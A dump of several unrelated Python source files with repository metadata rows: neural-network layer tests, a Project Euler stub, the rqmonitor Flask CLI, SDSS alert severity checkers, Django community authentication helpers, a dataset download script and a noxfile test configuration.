      nonzero = result2.numpy() != 0
      assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
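One detail worth noting about the final assertion: inverted dropout scales surviving activations by 1 / (1 - rate), which happens to equal 1 / rate only because rate is 0.5 in the test above. A dependency-free sketch of the scheme (names are illustrative):

```python
import random

def inverted_dropout(xs, rate, rng=None):
    """Inverted dropout: zero each element with probability `rate` and scale
    survivors by 1 / (1 - rate), so the expected value is unchanged."""
    rng = rng or random.Random(0)
    keep = 1.0 - rate
    return [0.0 if rng.random() < rate else x / keep for x in xs]

xs = [1.0, 2.0, 3.0, 4.0]
out = inverted_dropout(xs, rate=0.5)
# Every surviving element is its input divided by the keep probability.
assert all(o == 0.0 or o == x / 0.5 for x, o in zip(xs, out))
```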
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
"""Test invoking AlphaShareLayer in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.AlphaShareLayer()
result = layer(input1, input2)
assert input1.shape == result[0].shape
assert input2.shape == result[1].shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.AlphaShareLayer()
result2 = layer2(input1, input2)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_sluice_loss(self):
"""Test invoking SluiceLoss in eager mode."""
with context.eager_mode():
input1 = np.ones((3, 4)).astype(np.float32)
input2 = np.ones((2, 2)).astype(np.float32)
result = layers.SluiceLoss()(input1, input2)
assert np.allclose(result, 40.0)
def test_beta_share(self):
"""Test invoking BetaShare in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.BetaShare()
result = layer(input1, input2)
assert input1.shape == result.shape
assert input2.shape == result.shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.BetaShare()
result2 = layer2(input1, input2)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result, result3)
def test_ani_feat(self):
"""Test invoking ANIFeat in eager mode."""
with context.eager_mode():
batch_size = 10
max_atoms = 5
input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
layer = layers.ANIFeat(max_atoms=max_atoms)
result = layer(input)
# TODO What should the output shape be? It's not documented, and there
# are no other test cases for it.
def test_graph_embed_pool_layer(self):
"""Test invoking GraphEmbedPoolLayer in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphEmbedPoolLayer(num_vertices=6)
result = layer(V, adjs)
assert result[0].shape == (10, 6, 50)
assert result[1].shape == (10, 6, 5, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphEmbedPoolLayer(num_vertices=6)
result2 = layer2(V, adjs)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_graph_cnn(self):
"""Test invoking GraphCNN in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphCNN(num_filters=6)
result = layer(V, adjs)
assert result.shape == (10, 100, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphCNN(num_filters=6)
result2 = layer2(V, adjs)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result, result3)
def test_hinge_loss(self):
"""Test invoking HingeLoss in eager mode."""
with context.eager_mode():
n_labels = 1
n_logits = 1
logits = np.random.rand(n_logits).astype(np.float32)
labels = np.random.rand(n_labels).astype(np.float32)
result = layers.HingeLoss()(labels, logits)
assert result.shape == (n_labels,)
| 37.264995 | 94 | 0.654747 | 4,572 | 34,172 | 4.768591 | 0.071085 | 0.052426 | 0.052289 | 0.043345 | 0.760618 | 0.712503 | 0.676131 | 0.639116 | 0.612054 | 0.571874 | 0 | 0.032992 | 0.231856 | 34,172 | 916 | 95 | 37.305677 | 0.797592 | 0.166803 | 0 | 0.538922 | 0 | 0 | 0.000427 | 0 | 0 | 0 | 0 | 0.001092 | 0.208084 | 1 | 0.094311 | false | 0 | 0.013473 | 0 | 0.109281 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f8a7e27a6b1a8b93095262140e88ebc073c0f4 | 790 | py | Python | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed


def dummy(n):
    pass


if __name__ == '__main__':
    n = 1000
    i = 10000
    prob_id = 49
    timed.caller(dummy, n, i, prob_id)
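The `dummy` stub above leaves the problem unsolved; a self-contained sketch of one straightforward approach (trial-division primality, function names are mine, not part of the `timed` harness):

```python
def is_prime(n):
    """Trial-division primality test; adequate for 4-digit candidates."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    f = 3
    while f * f <= n:
        if n % f == 0:
            return False
        f += 2
    return True

def prime_permutation_sequence(step=3330):
    """Return the 12-digit concatenation of the 4-digit arithmetic prime
    sequence (common difference `step`) whose terms are digit permutations
    of one another, skipping the 1487, 4817, 8147 example."""
    for a in range(1000, 10000 - 2 * step):
        if a == 1487:  # the sequence already given in the problem statement
            continue
        b, c = a + step, a + 2 * step
        if (all(is_prime(x) for x in (a, b, c))
                and sorted(str(a)) == sorted(str(b)) == sorted(str(c))):
            return int('%d%d%d' % (a, b, c))

print(prime_permutation_sequence())  # 296962999629
```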
| 30.384615 | 77 | 0.711392 | 127 | 790 | 4.346457 | 0.622047 | 0.032609 | 0.048913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066456 | 0.2 | 790 | 25 | 78 | 31.6 | 0.806962 | 0.775949 | 0 | 0 | 0 | 0 | 0.04908 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f93be850b5b4fb3f0bf11c18b271c4dd267dcc | 8,879 | py | Python | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | ["Apache-2.0"]
"""
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from urllib.parse import urlparse, parse_qs, unquote

from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
                              UnixDomainSocketConnection,
                              SSLConnection)

import click
from flask import Flask, Response, request

from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")


def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
    """Add HTTP Basic Auth to a blueprint.

    Note this is only for casual use!
    """
    @blueprint.before_request
    def basic_http_auth(*args, **kwargs):
        auth = request.authorization
        if auth is None or auth.password != password or auth.username != username:
            return Response(
                "Please login",
                401,
                {"WWW-Authenticate": 'Basic realm="{}"'.format(realm)},
            )
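For reference, the credential check that `request.authorization` feeds can be reproduced without Flask. A framework-free sketch of HTTP Basic Auth header parsing (the encoding follows RFC 7617; `parse_basic_auth` is illustrative, not part of rqmonitor):

```python
import base64


def parse_basic_auth(header_value):
    # "Basic <base64(username:password)>" -> (username, password) or None
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic" or not encoded:
        return None
    try:
        decoded = base64.b64decode(encoded).decode("utf-8")
    except Exception:
        return None
    username, sep, password = decoded.partition(":")
    return (username, password) if sep else None


token = base64.b64encode(b"admin:s3cret").decode("ascii")
print(parse_basic_auth("Basic " + token))  # -> ('admin', 's3cret')
```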
def create_app_with_blueprint(config=None, username=None, password=None,
                              url_prefix='', blueprint=monitor_blueprint):
    """Return Flask app with default configuration and registered blueprint."""
    app = Flask(__name__)

    # Override with any settings in config file, if given.
    if config:
        app.config.from_object(importlib.import_module(config))

    # Override from a configuration file in the env variable, if present.
    if "RQ_MONITOR_SETTINGS" in os.environ:
        app.config.from_envvar("RQ_MONITOR_SETTINGS")

    # Optionally add basic auth to blueprint and register with app.
    if username:
        add_basic_auth(blueprint, username, password)

    app.register_blueprint(blueprint, url_prefix=url_prefix)
    return app
def check_url(url, decode_components=False):
    """
    Taken from redis-py for a basic check before passing the URL to redis-py.
    Kept here to show errors before launching the app.

    For example::

        redis://[[username]:[password]]@localhost:6379/0
        rediss://[[username]:[password]]@localhost:6379/0
        unix://[[username]:[password]]@/path/to/socket.sock?db=0

    Three URL schemes are supported:

    - ``redis://``
      <https://www.iana.org/assignments/uri-schemes/prov/redis> creates a
      normal TCP socket connection
    - ``rediss://``
      <https://www.iana.org/assignments/uri-schemes/prov/rediss> creates
      an SSL-wrapped TCP socket connection
    - ``unix://`` creates a Unix Domain Socket connection

    There are several ways to specify a database number. The parse function
    will return the first specified option:

    1. A ``db`` querystring option, e.g. redis://localhost?db=0
    2. If using the redis:// scheme, the path argument of the url, e.g.
       redis://localhost/0
    3. The ``db`` argument to this function.

    If none of these options are specified, db=0 is used.

    The ``decode_components`` argument allows this function to work with
    percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
    escapes will be replaced by their single-character equivalents after
    the URL has been parsed. This only applies to the ``hostname``,
    ``path``, ``username`` and ``password`` components.

    Any additional querystring arguments and keyword arguments will be
    passed along to the ConnectionPool class's initializer. The querystring
    arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
    are parsed as float values. The arguments ``socket_keepalive`` and
    ``retry_on_timeout`` are parsed to boolean values that accept
    True/False, Yes/No values to indicate state. Invalid types cause a
    ``UserWarning`` to be raised. In the case of conflicting arguments,
    querystring arguments always win.
    """
    url = urlparse(url)
    url_options = {}

    for name, value in (parse_qs(url.query)).items():
        if value and len(value) > 0:
            parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
            if parser:
                try:
                    url_options[name] = parser(value[0])
                except (TypeError, ValueError):
                    logger.warning(UserWarning(
                        "Invalid value for `%s` in connection URL." % name
                    ))
            else:
                url_options[name] = value[0]

    if decode_components:
        username = unquote(url.username) if url.username else None
        password = unquote(url.password) if url.password else None
        path = unquote(url.path) if url.path else None
        hostname = unquote(url.hostname) if url.hostname else None
    else:
        username = url.username or None
        password = url.password or None
        path = url.path
        hostname = url.hostname

    # We only support redis://, rediss:// and unix:// schemes.
    if url.scheme == 'unix':
        url_options.update({
            'username': username,
            'password': password,
            'path': path,
            'connection_class': UnixDomainSocketConnection,
        })
    elif url.scheme in ('redis', 'rediss'):
        url_options.update({
            'host': hostname,
            'port': int(url.port or 6379),
            'username': username,
            'password': password,
        })
        # If there's a path argument, use it as the db argument if a
        # querystring value wasn't specified
        if 'db' not in url_options and path:
            try:
                url_options['db'] = int(path.replace('/', ''))
            except (AttributeError, ValueError):
                pass
        if url.scheme == 'rediss':
            url_options['connection_class'] = SSLConnection
    else:
        valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
        raise ValueError('Redis URL must specify one of the following '
                         'schemes (%s)' % valid_schemes)

    return True
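The database-resolution rules described in the docstring can be checked with the standard library alone. A small sketch (independent of redis-py; `db_from_url` is an illustrative helper) of rules 1 and 2, where a `?db=N` querystring wins over the `/N` path:

```python
from urllib.parse import urlparse, parse_qs


def db_from_url(url):
    # querystring ?db=N wins; otherwise fall back to the /N path; default 0.
    parts = urlparse(url)
    query = parse_qs(parts.query)
    if "db" in query:
        return int(query["db"][0])
    digits = parts.path.replace("/", "")
    return int(digits) if digits.isdigit() else 0


print(db_from_url("redis://localhost:6379/2"))     # -> 2
print(db_from_url("redis://localhost:6379?db=5"))  # -> 5
print(db_from_url("redis://localhost:6379"))       # -> 0
```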
@click.command()
@click.option(
    "-b",
    "--bind",
    default="0.0.0.0",
    help="IP or hostname on which to bind HTTP server",
)
@click.option(
    "-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
    "--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
    "--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
    "-c",
    "--config",
    default=None,
    help="Configuration file (Python module on search path)",
)
@click.option(
    "-u",
    "--redis-url",
    default=[RQ_MONITOR_REDIS_URL],
    multiple=True,
    help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
    "--refresh-interval",
    "--interval",
    "refresh_interval",
    default=RQ_MONITOR_REFRESH_INTERVAL,
    type=int,
    help="Refresh interval in ms",
)
@click.option(
    "--extra-path",
    default=".",
    multiple=True,
    help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
    "-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
    bind,
    port,
    url_prefix,
    username,
    password,
    config,
    redis_url,
    refresh_interval,
    extra_path,
    debug,
    verbose,
):
    """Run the RQ Monitor Flask server.

    All configuration can be set on the command line or through environment
    variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.

    A subset of the configuration (the configuration parameters used by the
    underlying flask blueprint) can also be provided in a Python module
    referenced using --config, or with a .cfg file referenced by the
    RQ_MONITOR_SETTINGS environment variable.
    """
    if extra_path:
        sys.path += list(extra_path)

    click.echo("RQ Monitor version {}".format(VERSION))

    app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
    app.config["RQ_MONITOR_REDIS_URL"] = redis_url
    app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval

    # Conditionally disable Flask console messages
    # See: https://stackoverflow.com/questions/14888799
    if verbose:
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.ERROR)
        logger.error(" * Running on {}:{}".format(bind, port))

    for url in redis_url:
        check_url(url)

    app.run(host=bind, port=port, debug=debug)
def main():
    run(auto_envvar_prefix="RQ_MONITOR")


if __name__ == '__main__':
    main()
f209fda8f0cfe43f72b6eb3a30447ef4d992f64f | 6,764 | py | Python | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | ["BSD-3-Clause"]
#!/usr/bin/env python
# encoding: utf-8
#
# dangerKey.py
#
# Created by John Donor on 10 April 2019

import re, time

from yaml import YAMLObject

from alertsActor import log


class diskCheck(YAMLObject):
    """evaluate a disk keyword
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        """The keyval is an enum ('Ok', 'Warning', 'Serious', 'Critical')
        and the amount of free space (GB)
        """
        keyval = keyState.keyword
        if (keyval[0]).upper() == 'OK':
            return "ok"
        elif (keyval[0]).upper() == 'WARNING':
            return "warn"
        elif (keyval[0]).upper() == 'SERIOUS':
            return "serious"
        elif (keyval[0]).upper() == 'CRITICAL':
            return "critical"
        else:
            return "info"
class doNothing(object):
    """camCheck alerts can't check themselves;
    dummy class to facilitate that
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        return keyState.severity
class camCheck(YAMLObject):
    """evaluate a camCheck alert
    """
    def __init__(self):
        # NEVER GETS CALLED!!!! -_-
        pass

    def generateCamCheckAlert(self, key, severity):
        inst = key[:3]
        side = key[3]
        key = "camCheck." + key
        instruments = ["boss"]

        # most keywords will be SP[12][RB]
        # check if they are and assign appropriate instruments
        if inst in ["SP1", "SP2"]:
            instruments.append("boss.{}".format(inst))
            if side in ["R", "B"]:
                instruments.append("boss.{}.{}".format(inst, side))

        if severity in ["critical", "serious"]:
            selfClear = False
            addresses = self.emailAddresses
        else:
            selfClear = True
            addresses = None

        if key not in self.triggered:
            self.triggered.append(key)

        if key not in self.alertsActor.monitoring:
            dumbCheck = doNothing()
            self.alertsActor.addKey(key, severity=severity, checkAfter=120,
                                    selfClear=selfClear, checker=dumbCheck,
                                    keyword="'Reported by camCheck'",
                                    instruments=instruments, emailAddresses=addresses,
                                    emailDelay=0)

        if self.alertsActor.monitoring[key].active:
            self.alertsActor.monitoring[key].stampTime()
        else:
            self.alertsActor.monitoring[key].setActive(severity)

    def __call__(self, keyState):
        keyval = keyState.keyword
        if self.alertsActor is None:
            print("setting alertsActor for camCheck!!")
            self.alertsActor = keyState.alertsActorReference
            # do this only once hopefully
            for i in ["boss.SP1", "boss.SP2", "boss.SP1.R", "boss.SP2.R",
                      "boss.SP1.B", "boss.SP2.B"]:
                self.alertsActor.instrumentDown[i] = False

        # print("CAMCHECK, len {}, type {}, key: {}".format(len(keyval), type(keyval), keyval))
        log.info('CAMCHECK reported {}'.format(keyval))

        if type(keyval) == str:
            # could possibly try to fix this in hubModel casts, but easier here
            keyval = [keyval]
        if len(keyval) == 1 and keyval[0] == "None":  # this is a bug somewhere upstream
            keyval = []

        for k in keyval:
            if re.search(r"SP[12][RB][0-3]?CCDTemp", k):
                self.generateCamCheckAlert(k, "critical")
            elif re.search(r"SP[12]SecondaryDewarPress", k):
                self.generateCamCheckAlert(k, "critical")
            elif re.search(r"SP[12](DAQ|Mech|Micro)NotTalking", k):
                self.generateCamCheckAlert(k, "critical")
            elif re.search(r"DACS_SET", k):
                self.generateCamCheckAlert(k, "critical")
            elif re.search(r"SP[12]LN2Fill", k):
                self.generateCamCheckAlert(k, "serious")
            elif re.search(r"SP[12](Exec|Phase)Boot", k):
                self.generateCamCheckAlert(k, "serious")
            else:
                self.generateCamCheckAlert(k, "warn")

        for k in self.triggered:
            if k.split(".")[-1] not in keyval:  # b/c we know its camCheck already
                self.alertsActor.monitoring[k].severity = "ok"
                # now it can check itself and find out its cool
                # and then decide to disappear if its acknowledged, etc etc
                self.alertsActor.monitoring[k].checkKey()
                self.triggered.remove(k)

        # never flag camCheck, always monitored keys
        return "ok"
class heartbeatCheck(YAMLObject):
    """check a heartbeat.
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        if time.time() - keyState.lastalive < keyState.checkAfter:
            return "ok"
        elif time.time() - keyState.lastalive > 5 * keyState.checkAfter:
            return "critical"
        else:
            return keyState.defaultSeverity


class above(YAMLObject):
    """literally: is the value too high
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        if keyState.keyword > keyState.dangerVal:
            return keyState.defaultSeverity
        else:
            return "ok"


class below(YAMLObject):
    """literally: is the value too low
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        if keyState.keyword < keyState.dangerVal:
            return keyState.defaultSeverity
        else:
            return "ok"


class neq(YAMLObject):
    """literally: does the value differ from the expected value
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        if keyState.keyword != keyState.dangerVal:
            return keyState.defaultSeverity
        else:
            return "ok"


class inList(YAMLObject):
    """is any value in the list "True", e.g. flagged
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        if [k for k in keyState.keyword if k]:
            return keyState.defaultSeverity
        else:
            return "ok"


class firstElem(YAMLObject):
    """does the first element of the list match the danger value
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        if keyState.keyword[0] == keyState.dangerVal:
            return keyState.defaultSeverity
        else:
            return "ok"


class default(object):
    """check equality to a dangerval
    """
    def __init__(self):
        pass

    def __call__(self, keyState):
        if keyState.keyword == keyState.dangerVal:
            return keyState.defaultSeverity
        else:
            return "ok"
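The checkers above all share one callable protocol: given a key state, return a severity string. A minimal standalone sketch of that pattern (the `KeyState` stub and `Above` class here are illustrative; the real key state object lives elsewhere in alertsActor):

```python
class KeyState:
    # Stub carrying just the fields the checkers read.
    def __init__(self, keyword, dangerVal, defaultSeverity="warn"):
        self.keyword = keyword
        self.dangerVal = dangerVal
        self.defaultSeverity = defaultSeverity


class Above:
    # Same shape as the `above` checker: severity if too high, else "ok".
    def __call__(self, keyState):
        if keyState.keyword > keyState.dangerVal:
            return keyState.defaultSeverity
        return "ok"


checker = Above()
print(checker(KeyState(80, 75)))  # -> warn  (value exceeds danger threshold)
print(checker(KeyState(70, 75)))  # -> ok
```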
f20a9c6a0a0f41308a9f256ea4ec3d2997af5cd5 | 6,388 | py | Python | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | ["BSD-3-Clause", "MIT"]
"""
Various utility functions used by django_community and
other apps to perform authentication related tasks.
"""
import hashlib, re

import django.forms as forms
from django.core.exceptions import ObjectDoesNotExist
from django.forms import ValidationError
import django.http as http
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import logout as auth_logout
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login

from django_community.models import UserOpenID, UserProfile
def openid_logout(request):
    """
    Clears the session, which effectively logs out the current
    OpenID user.
    """
    request.session.flush()


def handle_logout(request):
    """
    Log out.
    """
    auth_logout(request)


def get_logged_user(request):
    """
    Returns the current user who is logged in; checks for an OpenID user first,
    then for a regular user. Returns None if no user is currently logged in.
    """
    user = None
    if settings.OPENID_ENABLED and hasattr(request, 'openid'):
        user = UserOpenID.objects.get_for_openid(request, request.openid)
    if not user:
        user = request.user
    return user
def handle_login(request, data):
    """
    Logs the user in based on form data from django_community.LoginForm.
    """
    user = authenticate(username = data.get('username', None),
                        password = data.get('password', None))
    user_object = User.objects.get(username = data.get('username', None))
    if user is not None:
        login(request, user)
    return user


def handle_signup(request, data):
    """
    Signs a user up based on form data from django_community.SignupForm.
    """
    from django.contrib.auth.models import get_hexdigest

    username = data.get('username', None)
    email = data.get('email', None)
    password = data.get('password', None)
    try:
        user = User.objects.get(username = username, email = email)
    except ObjectDoesNotExist:
        user = User(username = username, email = email)
        user.save()
    user.set_password(password)
    user.save()  # set_password only hashes in memory; persist it
    user_profile = UserProfile.objects.get_user_profile(user)
    user = authenticate(username = username, password = password)
    login(request, user)
    return user
def get_or_create_from_openid(openid):
    """
    Returns a User with the given openid or
    creates a new user and associates the openid with that user.
    """
    try:
        user = User.objects.get(username = openid)
    except ObjectDoesNotExist:
        password = hashlib.sha256(openid).hexdigest()
        user = User(username = openid, email = '', password = password)
        user.save()
        user.display_name = "%s_%s" % ('user', str(user.id))
        user.save()
    return user


def generate_random_user_name():
    """
    Generates a random user name user_{user_id}_{salt}
    to be used for creating new users.
    """
    import random

    current_users = User.objects.all().order_by('-id')
    if current_users:
        next_id = current_users[0].id + 1
    else:
        next_id = 1
    random_salt = random.randint(1, 5000)
    return 'user_%s_%s' % (str(next_id), str(random_salt))
def create_user_from_openid(request, openid):
    """
    Creates a new User object associated with the given
    openid.
    """
    from django_community.config import OPENID_FIELD_MAPPING
    from django_utils.request_helpers import get_ip

    username = generate_random_user_name()
    profile_attributes = {}
    for attribute in OPENID_FIELD_MAPPING.keys():
        mapped_attribute = OPENID_FIELD_MAPPING[attribute]
        if openid.sreg and openid.sreg.get(attribute, ''):
            profile_attributes[mapped_attribute] = openid.sreg.get(attribute, '')
    new_user = User(username = username)
    new_user.save()
    new_openid = UserOpenID(openid = openid.openid, user = new_user)
    new_openid.save()
    new_user_profile = UserProfile.objects.get_user_profile(new_user)
    # set the collected sreg attributes on the profile that gets saved
    for filled_attribute in profile_attributes.keys():
        setattr(new_user_profile, filled_attribute, profile_attributes[filled_attribute])
    new_user_profile.save()
    return new_user
def get_anon_user(request):
    """
    Returns an anonymous user corresponding to this IP address if one exists,
    else creates an anonymous user and returns it.
    """
    try:
        anon_user = User.objects.get(username = generate_anon_user_name(request))
    except ObjectDoesNotExist:
        anon_user = create_anon_user(request)
    return anon_user


def create_anon_user(request):
    """
    Creates a new anonymous user based on the ip provided by the request
    object.
    """
    anon_user_name = generate_anon_user_name(request)
    anon_user = User(username = anon_user_name)
    anon_user.save()
    user_profile = UserProfile(user = anon_user, display_name = 'anonymous')
    user_profile.save()
    return anon_user


def generate_anon_user_name(request):
    """
    Generate an anonymous user name based on an ip address.
    """
    from django_utils.request_helpers import get_ip

    ip = get_ip(request)
    return "anon_user_%s" % (str(ip))


def is_anon_user(user):
    """
    Determine if a user is anonymous or not.
    """
    return user.username[0:10] == 'anon_user_'


def is_random(name):
    """
    Determine if a user has a randomly generated display name.
    """
    if len(name.split('_')) and name.startswith('user'):
        return True
    else:
        return False


def process_ax_data(user, ax_data):
    """
    Process OpenID AX data.
    """
    import django_openidconsumer.config

    emails = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('email').get('type_uri', ''), '')
    display_names = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('alias').get('type_uri', ''), '')
    if emails and not user.email.strip():
        user.email = emails[0]
        user.save()
    if not user.profile.display_name.strip() or is_random(user.profile.display_name):
        if display_names:
            user.profile.display_name = display_names[0]
        elif emails:
            user.profile.display_name = emails[0].split('@')[0]
        user.profile.save()
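The anonymous-user scheme above keys one account to each client IP address. A framework-free sketch of the same naming and detection logic (Django and `get_ip` are stubbed out; these standalone functions are illustrative):

```python
def anon_user_name(ip):
    # One anonymous account per client IP address.
    return "anon_user_%s" % ip


def is_anon(username):
    # Mirrors the prefix check used above.
    return username[0:10] == 'anon_user_'


name = anon_user_name("10.0.0.7")
print(name)               # -> anon_user_10.0.0.7
print(is_anon(name))      # -> True
print(is_anon("alice"))   # -> False
```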
f20f3b3cdb095ea301a3efa6ea5c8c922e9be8db | 640 | py | Python | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | ["MIT"] | 44 | 2016-09-07T11:04:10.000Z | 2022-03-14T07:38:17.000Z
from subprocess import call
import os
import sys

sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))

import settings

data_zip_path = os.path.join(settings.lfw10_root, "LFW10.zip")
data_url = "http://cvit.iiit.ac.in/images/Projects/relativeParts/LFW10.zip"

# Downloading the data zip and extracting it
call(["wget",
      "--continue",  # do not download things again
      "--tries=0",  # try many times to finish the download
      "--output-document=%s" % data_zip_path,  # save it to the appropriate place
      data_url])
call(["unzip -d %s %s" % (settings.lfw10_root, data_zip_path)], shell=True)
f218482525c6f07411100d66a18c105ea0a2d6c8 | 926 | py | Python | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | ["Apache-2.0"]
TEST_CONFIG_OVERRIDE = {
    # An envvar key for determining the project id to use. Change it
    # to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
    # build specific Cloud project. You can also use your own string
    # to use your own Cloud project.
    "gcloud_project_env": "BUILD_SPECIFIC_GCLOUD_PROJECT",
    # 'gcloud_project_env': 'BUILD_SPECIFIC_GCLOUD_PROJECT',
    # A dictionary you want to inject into your test. Don't put any
    # secrets here. These values will override predefined values.
    "envs": {
        "GA_TEST_PROPERTY_ID": "276206997",
        "GA_TEST_ACCOUNT_ID": "199820965",
        "GA_TEST_USER_LINK_ID": "103401743041912607932",
        "GA_TEST_PROPERTY_USER_LINK_ID": "105231969274497648555",
        "GA_TEST_ANDROID_APP_DATA_STREAM_ID": "2828100949",
        "GA_TEST_IOS_APP_DATA_STREAM_ID": "2828089289",
        "GA_TEST_WEB_DATA_STREAM_ID": "2828068992",
    },
}
